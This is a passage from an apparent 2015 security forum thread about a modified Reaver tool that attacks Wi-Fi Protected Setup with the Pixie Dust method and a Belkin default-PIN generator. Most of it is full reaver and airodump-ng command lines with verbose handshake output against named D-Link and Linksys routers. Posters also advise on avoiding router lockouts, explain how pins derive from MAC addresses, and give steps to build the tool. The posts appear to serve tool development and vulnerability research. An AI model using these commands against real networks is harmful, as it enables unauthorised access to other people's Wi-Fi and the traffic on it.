    [P] E-Hash1: 2c:08:61:26:58:76:5d:f6:ee:59:d9:7a:32:43:b8:f9:1f:05:3c:a4:cc:f6:22:3a:24:c8:9c:e2:ef:df:3a:52
    [P] E-Hash2: 0e:3a:b4:d2:93:21:91:5e:66:3b:f4:e6:13:db:40:87:b9:fd:80:0b:2b:fa:87:37:fb:5d:41:67:21:38:aa:61
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p2_index set to 1
    [+] Pin count advanced: 10001. Max pin attempts: 11000
    [+] Trying pin 69130571.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    ^C
    [+] Session saved.
    root@root:~# reaver -i mon0 -b 14:D6:4D:2D:C7:64 -c 3 -vv -W1 -S
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead
    
    [+] Switching mon0 to channel 3
    [?] Restore previous session for 14:D6:4D:2D:C7:64? [n/Y] n
    [+] Waiting for beacon from 14:D6:4D:2D:C7:64
    [+] Associated with 14:D6:4D:2D:C7:64 (ESSID: 67248Lengen)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 88:f6:3a:26:77:59:5d:b7:f9:07:f7:16:4b:6a:1c:af
    [P] PKE: 9b:17:58:e6:f5:d8:bf:6e:b2:c7:4c:b3:b4:33:06:66:c2:1c:fa:0b:ae:a2:77:c2:25:64:1f:3f:cc:61:98:07:1f:bf:90:7c:bc:2f:c3:c0:f9:6b:07:77:bb:5c:58:18:e5:80:22:41:2c:28:77:d5:21:30:9f:37:70:94:aa:36:b4:dd:82:50:0d:28:b0:12:c3:cd:42:a8:d1:76:9b:90:4d:e9:a7:4e:52:4e:27:c4:92:39:af:31:4a:99:9e:33:ca:76:c6:a1:05:67:8f:87:ca:fc:6f:92:d7:47:99:4f:86:0d:a7:3c:7c:b2:b7:cc:6a:fc:a1:d8:81:0e:a8:c3:79:99:a7:c7:cb:01:94:dc:5c:ac:15:3f:25:22:85:47:6b:81:30:bf:aa:f5:d2:ab:ac:5a:b0:72:13:0b:85:97:02:15:70:11:0e:ce:49:16:43:a9:d3:23:89:6b:5e:cf:99:63:9a:bb:b4:e0:1f:3b:83:6e:f7:ff:72:e4:36:d5
    [P] WPS Manufacturer: D-Link
    [P] WPS Model Number: DIR-615
    [P] WPS Model Serial Number: none
    [Pin Gen] Belkin Default Pin Generator by devttys0 team
    [Pin Gen] Pin Generated : 95278582
    
    root@root:~# reaver -i mon0 -b 14:D6:4D:2D:C7:64 -c 3 -vv -p 95278582
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead
    
    [+] Switching mon0 to channel 3
    [+] Waiting for beacon from 14:D6:4D:2D:C7:64
    [+] Associated with 14:D6:4D:2D:C7:64 (ESSID: 67248Lengen)
    [+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
    [+] Trying pin 95278582.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: ff:94:71:b4:2c:c9:c9:f7:58:84:92:e0:5c:f4:76:ee
    [P] PKE: 57:c6:10:df:65:ef:bc:3b:d4:f0:04:9c:ad:01:05:58:ff:67:c5:31:67:16:f5:bf:6d:0e:13:2e:b2:87:f9:a3:12:1d:bb:3b:79:be:6a:34:eb:e2:2d:3f:92:65:56:57:87:9a:b6:7b:0f:59:ba:d0:b3:28:1f:97:56:50:03:f0:1e:a8:68:f9:6f:23:f7:81:98:10:de:9a:88:c6:39:36:78:62:ae:86:29:c0:d7:a3:b4:93:2c:34:b5:d1:a0:7f:a0:de:16:59:67:d8:82:93:e9:79:77:23:3a:19:b8:7f:e6:c8:c6:15:33:c7:2a:c2:82:c6:2a:64:e9:98:3e:26:47:1a:b5:96:68:ee:bd:80:4c:ba:8e:ff:2f:94:e9:b2:fd:6a:89:e1:a8:59:f1:c6:8c:00:cb:1e:ac:ca:87:e1:f8:88:9a:fb:36:26:31:90:86:ee:2c:81:40:71:d0:e8:2d:f0:37:25:73:ff:e6:56:ee:7f:1c:d2:03:8a:3b:97
    [P] WPS Manufacturer: D-Link
    [P] WPS Model Number: DIR-615
    [P] WPS Model Serial Number: none
    [+] Received M1 message
    [P] PKR: 73:ff:53:78:47:21:ee:d6:b8:90:4f:4f:bf:14:d6:7a:80:f8:b0:60:d7:45:9e:ca:96:a4:ca:d1:e5:09:5e:d1:14:68:2d:78:45:e1:f8:28:39:54:13:2a:8f:c5:e0:8d:9e:02:cb:78:85:7d:e3:71:c4:34:91:ef:19:dc:e6:47:10:1e:b7:ec:08:a7:2a:6a:f2:b1:52:ab:43:f0:ce:0e:cb:68:30:d7:14:12:5d:6f:d0:0a:16:ad:65:ff:1f:6f:80:22:d8:70:87:1f:2f:65:de:af:63:b1:92:1d:20:e2:a1:6a:db:4b:59:4d:fc:ea:e0:e0:d7:53:4f:b2:57:7e:58:e5:d1:f5:38:4c:a4:35:b0:77:dc:72:1f:c1:49:a6:62:aa:83:4c:52:69:77:64:5a:52:7d:55:d4:79:6d:5b:fd:31:29:66:bc:0a:27:00:f0:1d:78:13:af:c8:62:10:18:84:30:59:65:d4:56:f2:14:9c:25:21:ed:7f:7d:93
    [P] AuthKey: eb:19:49:07:2c:05:08:68:49:1f:e1:03:71:fa:31:02:0e:e8:d2:6c:38:93:77:87:58:b1:5c:79:16:3f:f0:a3
    [+] Sending M2 message
    [P] E-Hash1: d8:46:6a:42:ad:f5:1a:c0:4e:07:f3:19:89:01:7f:13:4d:a2:c5:49:f5:ba:83:2f:22:c1:31:71:5e:5e:31:9e
    [P] E-Hash2: 62:b2:a7:fb:86:45:ed:89:f8:13:55:59:e4:91:70:0f:3a:26:5a:81:fd:71:60:13:fd:c2:c5:61:e4:85:1c:ba
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p2_index set to 1
    [+] Pin count advanced: 10001. Max pin attempts: 11000
    [+] Trying pin 95278582.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: c0:d3:bf:2d:93:56:f7:70:dc:a8:59:f5:36:d0:72:93
    [P] PKE: c5:86:72:3c:5a:5e:03:03:c1:13:4c:64:3e:3e:89:57:7b:76:f7:2b:1c:ff:2a:91:89:33:d6:d9:b3:bb:f4:d1:06:52:d9:01:87:cf:52:f5:6c:14:65:52:fd:8d:00:68:47:b9:d4:ca:14:db:8a:8a:3b:e6:d0:f1:eb:43:29:0f:28:5e:90:48:95:fa:53:ef:bb:9c:9e:f0:61:1d:71:83:85:cb:a8:32:ea:8b:50:a2:21:00:a2:5d:73:b7:bd:6c:d5:94:89:12:3d:e6:ca:5e:ff:8c:d5:4c:f4:d7:8b:9a:55:8e:5d:79:47:a4:38:11:66:68:29:4b:16:84:9c:a0:47:19:c5:50:a8:36:97:73:d2:63:a9:f3:16:bb:2a:4a:6e:8f:d7:09:e1:ac:5c:1f:68:19:17:b8:70:77:94:e0:d1:53:f7:8f:7d:f1:ad:14:c0:7e:da:9f:26:fe:19:ab:6c:52:dc:8e:88:fd:94:0b:cb:33:ce:d1:61:42:8c:bb
    [P] WPS Manufacturer: D-Link
    [P] WPS Model Number: DIR-615
    [P] WPS Model Serial Number: none
    [+] Received M1 message
    [P] PKR: b9:8a:d9:34:3e:d8:cd:45:b1:1d:f6:17:d1:16:fd:68:76:3d:59:44:de:eb:14:ca:dd:db:34:7f:1f:70:6a:45:0b:c1:0f:d7:c6:5e:5f:e0:be:30:ce:cc:66:9e:99:20:6c:86:2e:5a:de:5f:40:47:ef:68:fc:cd:3a:59:40:fa:09:5a:6d:c7:af:31:2a:96:b9:7a:08:d2:fc:75:dc:4b:0b:da:ca:61:de:c6:4e:d4:c7:49:58:89:83:97:d9:ef:21:c9:70:07:26:96:3a:6b:6b:71:34:fe:62:c0:61:ef:7e:66:bc:1c:44:10:0f:54:59:ba:5a:77:46:75:ce:87:7e:71:12:94:b5:51:2f:6b:b7:19:7b:cf:e5:45:78:5f:8b:1f:e1:1e:3f:09:1a:cc:99:4e:11:a7:fc:96:23:2d:8a:57:31:25:27:b6:67:43:56:63:c2:d6:7d:96:50:9d:e8:72:2a:36:7a:a5:8d:03:c4:0e:92:5a:56:6e:34:22
    [P] AuthKey: 34:92:98:34:a9:c5:f8:45:40:64:7e:e1:c5:de:27:af:88:35:80:6b:1e:49:d4:6e:d3:94:d3:99:0e:69:07:2c
    [+] Sending M2 message
    ^C

  35. #35
    Join Date
    2013-Oct
    Posts
    321
    @ t6_x

    Nice work matey, many thanks.

    I've got a question, what does "-P, --pixiedust-loop" do? and when should it be used?.

  36. #36
    Join Date
    2015-Apr
    Posts
    28
    I took screenshot on Wireshark .. M1-M2-M3-M4 messages and trying screen..

    Why Pixiewps does not work for TP LiNK RTL 8671 EV 2006 27 07 (Realtek)?

    Where is pin?
    Last edited by Saydamination; 2015-05-16 at 21:05.

  37. #37
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by slim76 View Post
    @ t6_x

    Nice work matey, many thanks.

    I've got a question, what does "-P, --pixiedust-loop" do? and when should it be used?.
    It stops the wps exchange after the M3 message is received. This way (hopefully) we will avoid any lockouts... the router will report a failed WPS exchange and won't count it You should only use it when attacking via Pixie Dust. If you are doing a regular old 11,000 pin brute force, don't use it.

  38. #38
    Join Date
    2013-Mar
    Posts
    3
    @t6_x

    Just confirming the latest version on git (1.5.2) requires on the K 1 option to test all 3 chipsets now ?

    Cheers
    Exta

  39. #39
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by Saydamination View Post
    http://i.imgur.com/aZv2TNu.png
    http://i.imgur.com/0zBtqpb.png
    http://i.imgur.com/f8AUILE.png
    http://i.imgur.com/n7Fs4s3.png
    http://i.imgur.com/sC80azr.png
    http://i.imgur.com/otwUL64.png
    http://i.imgur.com/RpB5I6T.png
    http://i.imgur.com/awpjzcU.png

    I took screenshot on Wireshark .. M1-M2-M3-M4 messages and trying screen..

    Why Pixiewps does not work for TP LiNK RTL 8671 EV 2006 27 07 (Realtek)?

    Where is pin?

    Because the failure of the pixiedust takes advantage, is a firmware failure and not a chipset failure.

    But as it is difficult to make a list of all firmawares which exist, chipset list is made where there is a higher probability
    the running attack work

  40. #40
    Join Date
    2015-Mar
    Posts
    127
    Just the Belkin pin Attack

    Target:
    Code:
    airodump-ng 
    CH  6 ][ Elapsed: 4 mins ][ 2015-04-19 09:48                                         
                                                                                                                                                                                                        
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH WPS           ESSID     MANUFACTURER
                                                                                                                                                                                                        
    ..............:52:A1  -66  24     1160      336    0   6  54e. WPA2 CCMP   PSK  1.0 LAB,DISP  999 Kane  Belkin International Inc.                                                                     
    ..............:37:56  -83   0        5        0    0   6  54e  WPA2 CCMP   PSK  1.0 LAB,DISP  999 Kane  Belkin International Inc.                                                                     
                                                                                                                                                                                                        
     BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                                          
                                                                                                                                                                                                         
    ..............:52:A1  ..............:37:56  -86   54e- 1e     0       98  999 Kane
    Reaver Attack
    Code:
    root@kali:~# reaver -i wlan3mon -b ..............:52:A1 --mac=..............:37:56 -N -S -K1 -W1
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
    
    [+] Waiting for beacon from ..............:52:A1
    [+] Associated with ..............:52:A1 (ESSID: 133 Kane)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [P] E-Nonce: 9c:60:b1:26:35:6b:54:36:94:b4:db:e3:8a:f8:98:99
    [P] PKE: ee:4a:2f:c4:45:67:2e:c2:e8:89:0c:c0:ad:08:31:0c:98:db:ce:d5:8c:53:23:8c:a3:e7:af:c1:f8:81:1f:69:88:8c:28:b9:bc:02:3f:32:4a:f6:f0:59:21:59:35:d8:0c:8f:44:ce:0d:34:f5:21:3f:8e:8e:d4:a1:03:62:4c:d2:e9:ea:fe:4d:15:72:a7:84:63:d6:0d:fb:c5:19:79:b8:57:96:b6:7f:e1:f8:a8:fe:28:88:76:04:ae:46:54:92:0a:0c:38:c4:b9:c3:dc:36:45:3a:65:18:93:ee:f4:f0:cc:6c:10:8b:8e:bc:c2:c9:1f:10:9c:61:ff:ce:d4:31:32:8c:30:31:f0:48:5d:2b:94:ec:c0:91:4e:2d:59:3f:e1:8c:13:c2:59:63:73:dc:a3:0e:67:fc:a2:b3:06:e7:b5:c0:17:36:73:77:14:d2:8f:d6:a2:d4:be:bb:4b:8f:3d:e6:2b:c0:81:50:0f:da:d5:09:b4:12:18:d2:e8
    [P] WPS Manufacturer: Linksys, LLC
    [P] WPS Model Number: WRT1900AC
    [P] WPS Model Serial Number: 13J10607432814
    [Pin Gen] Belkin Default Pin Generator by devttys0 team
    [Pin Gen] Pin Generated : 92454590
    [Pin Gen] Pin Generated (+1): 02932804
    [Pin Gen] Pin Generated (-1): 81966103
    Next Step? Try all three pins?
    reaver -i wlan3mon -b ..............:52:A1 --mac=..............:37:56 -N --pin=92454590
    Because reaver started looping, is this correct? had to ctrl+C

    Code:
    root@kali:~# reaver -i wlan3mon -b ..............:52:A1 --mac=..............:37:56 -N --pin=92454590
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
    
    [+] Waiting for beacon from ..............:52:A1
    [+] Associated with ..............52:A1 (ESSID: 133 Kane)
    [+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
    [P] E-Nonce: 2c:7b:dd:2f:82:20:e5:a0:f6:92:35:7a:f6:c9:2a:e7
    [P] PKE: 4a:6d:39:a0:aa:62:4c:05:69:35:0d:c8:7b:4a:5d:bf:8d:93:c6:49:93:c2:df:b5:ec:d6:73:cc:d6:4b:48:06:f2:2c:52:37:c2:a7:95:1a:28:e6:65:b0:5d:f0:f5:7e:12:e0:98:48:db:9a:4a:76:5d:45:3b:33:8e:d9:e6:d4:f4:76:42:7b:03:73:29:d3:f1:3b:56:0d:e7:95:76:9d:f8:94:bb:5a:67:59:45:73:70:d5:48:5b:5a:a2:89:d1:8f:69:43:00:1c:bc:ce:ae:48:7b:08:9e:64:c2:d7:21:b3:ed:73:99:43:dd:44:8a:a5:9a:24:fd:8c:02:7c:17:5c:f2:4a:5f:5b:9c:c3:8d:99:c1:49:5b:2e:5f:09:63:85:ff:8a:72:77:c6:0a:56:14:f7:29:28:9f:82:24:47:aa:1b:eb:28:16:0d:f0:e2:a9:d0:f9:01:e4:61:a0:b8:24:44:71:34:d0:e5:f5:3f:71:b8:88:12:04:01:36:15
    [P] WPS Manufacturer: Linksys, LLC
    [P] WPS Model Number: WRT1900AC
    [P] WPS Model Serial Number: 13J10607432814
    [P] PKR: e3:07:eb:ea:e5:8d:25:e4:a8:65:08:ab:52:99:3b:2c:8a:a4:c5:82:c9:46:96:62:1c:76:63:96:06:ba:e9:14:1d:d1:c0:1f:42:27:38:99:6d:14:c6:79:00:bf:9d:f5:77:98:73:9d:fd:83:52:f3:f1:cb:73:0e:e1:6d:d2:17:be:9b:ba:fc:16:f9:2d:22:e3:ab:c0:3a:90:b9:0c:3d:b0:0b:ad:90:89:b5:12:c9:41:3f:36:17:39:16:3b:a5:80:e4:a1:17:39:9b:1f:24:3f:f1:20:21:6a:f0:48:a9:05:73:3c:b6:06:c8:fe:34:a9:79:70:eb:ff:a8:7c:49:07:19:5f:c8:2e:76:a3:c7:8a:5d:10:28:72:f1:41:b2:38:d7:53:87:99:d4:bd:e0:9c:d7:01:01:cc:f9:b0:14:9e:6e:52:44:fe:34:66:b0:64:a1:69:73:4f:09:0e:93:89:0b:c9:cb:b6:51:d5:5f:ba:9e:7d:44:be:91:f0:d5
    [P] AuthKey: 19:f0:66:81:34:9e:6f:eb:41:7f:93:38:f7:42:ba:ce:6d:88:06:0c:76:43:d4:cc:9b:0f:c8:44:9d:43:21:e5
    [P] E-Hash1: 16:a4:f5:79:a7:5b:29:1d:1a:8f:d7:4e:dd:fd:5a:a6:8e:94:3c:34:f0:77:ae:e0:03:38:31:8f:85:25:fb:9c
    [P] E-Hash2: 10:90:3b:33:ed:74:7c:5e:9d:51:b7:2d:8f:4b:55:5f:d6:64:a2:91:7a:f7:66:7b:86:61:29:d1:a4:c0:bb:c4
    [P] E-Nonce: 72:08:37:e8:34:12:e7:50:25:d4:c1:80:f9:68:a0:0b
    [P] PKE: 19:a9:2d:d4:31:cb:f4:be:b8:38:bd:18:91:0a:de:f5:1b:1c:cf:6e:d3:c2:34:00:1e:88:db:6f:bd:a1:bb:d9:51:bc:d8:d2:60:24:c6:01:97:27:ee:ad:01:96:49:47:c4:e9:44:e6:c7:84:3b:25:d5:b7:ab:bf:18:f3:39:0e:ee:74:6d:b6:f0:a4:dc:55:c1:cf:ad:4c:2d:a2:af:fb:21:a1:77:5d:59:13:bc:0a:fd:6a:cc:91:97:96:78:7e:c0:88:65:7f:0d:b1:b9:dd:85:7a:45:2c:2f:78:d9:af:2a:0e:37:12:66:8f:c3:e8:fc:0c:b5:eb:32:5a:cd:36:88:91:ba:ad:3c:5f:72:e9:b1:53:91:51:1c:24:39:f1:6a:73:e7:bb:b7:40:f0:35:61:7d:84:37:b3:21:32:3d:55:9d:a4:e7:94:9b:2a:53:45:40:d7:5b:8c:5b:20:95:ad:1e:df:01:f7:33:7a:98:ca:7b:5b:91:a7:d7:c9:da
    [P] WPS Manufacturer: Linksys, LLC
    [P] WPS Model Number: WRT1900AC
    [P] WPS Model Serial Number: 13J10607432814
    [P] PKR: 72:be:10:2b:73:ae:55:e7:d0:4e:8a:b7:f4:d5:4c:90:f5:fe:83:9c:91:80:76:d7:93:bb:95:7c:07:67:3e:00:9c:54:f5:31:e5:be:13:cd:ad:77:93:13:5d:f8:fc:68:2d:27:36:3e:2a:99:8e:08:fe:d5:e1:85:f1:f5:2d:e7:a0:13:48:05:56:62:04:42:19:ef:ca:b9:6b:5c:15:02:37:df:51:c5:12:a2:63:0e:ce:fa:c1:46:43:ef:3e:45:70:2c:8c:da:21:ef:c3:6f:ea:81:de:85:b7:b0:df:f7:6a:84:48:f5:63:d6:29:bf:a8:cf:1e:da:1a:ba:7f:d7:ed:58:c9:7b:65:fe:21:3c:e8:24:89:9b:50:bb:b5:b4:92:ea:ec:3b:2c:8e:40:77:77:71:cb:37:b5:a6:76:8f:27:53:61:5b:ef:27:83:ea:b9:af:93:89:93:4b:d4:a6:1f:56:c7:e1:5d:32:7c:68:0e:54:e8:a1:58:ab:1a:41
    [P] AuthKey: c9:9d:b6:14:1f:5e:4d:c0:33:fb:84:01:5d:6f:f4:82:a3:e7:e1:c9:2f:da:52:e0:65:7d:e5:11:45:a3:74:91
    [P] E-Hash1: 0a:2f:d2:43:7f:21:b5:77:ab:84:a3:29:33:b0:6a:29:0e:56:e6:35:61:69:65:0b:70:37:34:6d:05:0e:82:ab
    [P] E-Hash2: 6c:07:cf:fc:5a:9d:50:ed:4d:d3:76:73:cb:5f:58:ee:e3:75:5f:e8:42:6d:f9:09:ee:14:5a:21:e2:98:b4:74
    [P] E-Nonce: 3c:15:76:fe:ec:f9:26:91:a0:33:2e:cb:24:03:4b:a5
    [P] PKE: f3:68:9b:3c:3e:9f:dc:1d:ac:0d:7c:1d:e0:fa:c1:b0:e9:f5:5b:bf:42:18:e7:ee:15:c9:e8:88:fd:5e:01:27:7e:87:17:60:07:4f:1e:82:d7:02:bb:f7:a8:b1:df:9d:5d:58:72:25:57:81:c8:32:5c:1d:97:46:77:81:af:0c:69:d8:46:6e:3b:51:10:e2:22:07:45:c9:36:84:28:22:ec:69:c1:95:a4:79:9d:62:e6:40:9f:b3:61:60:59:0d:c7:55:3c:9c:5c:30:7f:ec:6c:0e:2d:ba:16:b8:03:7b:52:f1:f1:95:9b:b6:d2:d2:88:a4:39:8f:99:89:5b:46:b2:b5:06:6c:2b:46:09:08:b5:72:94:ae:9a:d8:c1:a3:b5:e0:c1:b2:d0:ee:47:eb:f1:44:5b:be:09:e0:48:79:68:e8:21:1c:5a:2a:8e:df:af:e9:cb:6f:77:1a:b3:ec:d5:d0:a4:3a:77:d5:4d:37:1c:98:97:d1:42:ae:62:db
    [P] WPS Manufacturer: Linksys, LLC
    [P] WPS Model Number: WRT1900AC
    [P] WPS Model Serial Number: 13J10607432814
    [P] PKR: 42:ba:10:a6:1e:5a:ce:c9:89:4b:df:91:66:02:98:84:5b:c0:5a:07:93:a1:fe:71:16:49:87:61:63:b8:fd:7e:ff:79:e6:ae:8e:a6:cd:7b:1d:3e:31:40:d1:c7:fc:50:90:48:40:2d:b1:63:ee:c2:fc:d5:55:31:87:ed:98:a8:e0:ff:ac:cc:aa:ec:e2:b7:51:76:10:e0:47:11:9c:68:01:7e:65:74:9b:47:45:27:4e:44:b0:bd:32:09:b9:08:69:08:1a:ea:a0:93:78:da:ba:81:31:ee:6a:42:34:ec:7e:21:fb:f1:4b:f9:c3:03:43:1a:78:6a:3c:5f:0a:c6:42:28:c7:32:df:63:0e:ec:5a:38:22:49:98:54:9a:85:be:e4:67:f0:6a:9d:ed:a4:c2:3c:dc:d5:ed:14:29:da:25:4b:05:f7:fc:dc:76:71:a5:48:ba:42:1a:ab:eb:e2:0f:d4:7a:ef:82:20:16:4c:78:eb:9f:d5:16:4f:00:a2
    [P] AuthKey: d8:65:80:ae:99:23:c9:af:b9:32:63:32:80:3e:57:c4:56:42:59:bc:ee:e4:7d:21:53:dc:97:24:b8:02:ba:95
    [P] E-Hash1: ae:7a:f6:a6:1b:ac:f5:60:89:1e:d9:5c:91:38:31:e4:c9:3c:0f:74:d6:a2:c3:fb:6f:93:c1:09:6b:a7:88:a9
    [P] E-Hash2: 19:54:44:af:8f:a0:da:11:4a:6e:05:34:aa:63:b6:0e:8c:8e:03:12:fa:ab:54:d0:3d:3e:d8:21:14:d6:ac:19
    AP locked wps
    Code:
    CH  6 ][ Elapsed: 15 mins ][ 2015-04-19 10:31 ][ WPA handshake: ..............:52:A1                                         
                                                                                                                                      
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH WPS           ESSID     MANUFACTURER
                                                                                                                                      
    ..............:52:A1  -66  23     5527     1778    0   6  54e. WPA2 CCMP   PSK  Locked        999 Kane  Belkin International Inc.   
    ..............:37:56  -77  77     1776        0    0   6  54e  WPA2 CCMP   PSK  1.0 LAB,DISP  999 Kane  Belkin International Inc.   
                                                                                                                                      
     BSSID              STATION            PWR   Rate    Lost    Frames  Probe
    Should I try other pins after I try unlocking the router?
    whats the correct reaver command after pin found?

  41. #41
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Linksys was recently acquired by Belkin... that is why it shows the Manufacturer as Belkin. However, based on your reaver output, you are attacking a Linksys WRT1900AC... which technically is NOT a Belkin router.

    As far as I know, the WRT1900AC uses a Marvell chipset which is not very common, but certainly worth looking into as I assume they are very popular with all the WRT series fans. If you could get more data, I would love to take a look into it... hopefully with help from others

  42. #42
    Join Date
    2015-Mar
    Posts
    127
    Thanks for the info.....I just went by airodumps manufacturer, silly noob, I should have seen that.
    (used airodump because wash "rssi 00" on atheros chipset)

    What info do you need?
    Wireshark capture?
    Send where?

  43. #43
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Complete reaver WPS exchange and a cap of the exchange. You can e-mail it to my username@gmail.com (anti-spam haha)

  44. #44
    Join Date
    2015-Mar
    Posts
    127
    reaver with or without small keys?
    actually post the reaver syntax you want

  45. #45
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by nuroo View Post
    reaver with or without small keys?
    actually post the reaver syntax you want
    without small keys.

    Code:
    Manufacturer: 
    Model: 
    Model Number: 
    Serial Number: 
    E-Nonce: 
    PKR: 
    PKR: 
    E-Hash1: 
    E-Hash2: 
    Authkey:
    Some of the first part may not be available, but if they are it would be helpful. And I can find the rest in the cap.

  46. #46
    Join Date
    2015-Mar
    Posts
    127
    suggestion only

    Get Reaver
    wget https://github.com/t6x/reaver-wps-fo...ive/master.zip

    unzip master.zip (verify I'm not @ my pc)

    Build Reaver

    cd reaver-wps-fork-t6x-master
    cd src
    ./configure
    make

    Install Reaver

    sudo make install
    Last edited by nuroo; 2015-04-19 at 19:43.

  47. #47
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by Extradry View Post
    @t6_x

    Just confirming the latest version on git (1.5.2) requires on the K 1 option to test all 3 chipsets now ?

    Cheers
    Exta

    Sorry for the delay to respond, not had much time this weekend

    After tests and reviews, the best way to handle the situation is to make all possible attacks at once, even though much lighter time for this, the machine I'm using, takes about 1 min to finish one single pixiewps.

    But even so, it is more practical effect only once, than to divide the attack on some other options.

    I already was not very happy with the options, al soxrok2212 finally convinced me that it was better to have only one.

    So the answer is yes, the only option -K 1 run pixiewps with all the arguments, the pixiewps turn when it receives all the arguments he makes all bruteforces known until the moment.

  48. #48
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by nuroo View Post
    Just the Belkin pin Attack

    Should I try other pins after I try unlocking the router?
    whats the correct reaver command after pin found?

    It generates 3 pin

    This is because of the following.

    Not to know what the Mac that the router is using to generate the pin.

    So first it generates the pin for the BSSID used.

    After it generates the pin for the BSSID + 1, which is the MAC added +1 on the last value, that is why many routers Mac is sequential.

    ex:

    mac lan 00: 00: 00: 00: 00: 05
    Wlan1 00: 00: 00: 00: 00: 06

    But some models the wlan1 is the main mac and mac lan is the next, so as not to be sure of, is generated pin for Mac, Mac +1 and -1 Mac

    But of course you can have models that do not follow this rule, but all looked so far followed, some were the following mac and other previous mac






    Now with relation to the loop, missed the -vv option to really know what was going on, but I believe the pin gen generated not the correct pin and he was in the same loop trying to pin up the router go into lock.

    So far found only one router that the pin gen managed to generate correctly.

  49. #49
    Join Date
    2015-Apr
    Posts
    2
    In my area, the centurylink with a ZyXEL C1000Z is common... what kind of cap is needed? a full handshake right? and then a seperate txt with an unrelated set of pke/r ehash1/2 auth and nonce for that ap?

  50. #50
    Join Date
    2015-Feb
    Posts
    6
    For those wondering what reavers -P option is intended for:

    Option (-P) in reaver puts reaver into a loop mode that does not do the WPS protocol to or past the M4 message to hopefully avoid lockouts. This is to ONLY be used for PixieHash collecting to use with pixiewps, NOT to 'online' bruteforce pins.
    This option was made with intent of:

    ----Collecting repetitive hashes for further comparison and or analysis / discovery of new vulnerable chipsets , routers etc..

    ----Time sensistive attacks where the hash collecting continues repetitively until your time frame is met.

    ----For scripting purposes of whom want to use a possible lockout preventable way of PixieHash gathering for your Use case.

Similar Threads

  1. Reaver modfication for Pixie Dust Attack
    By t6_x in forum General Archive
    Replies: 81
    Last Post: 2015-05-05, 00:55
  2. Implement new WPS Pixie Dust Attack into Reaver
    By six in forum General Archive
    Replies: 24
    Last Post: 2015-01-28, 20:31

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •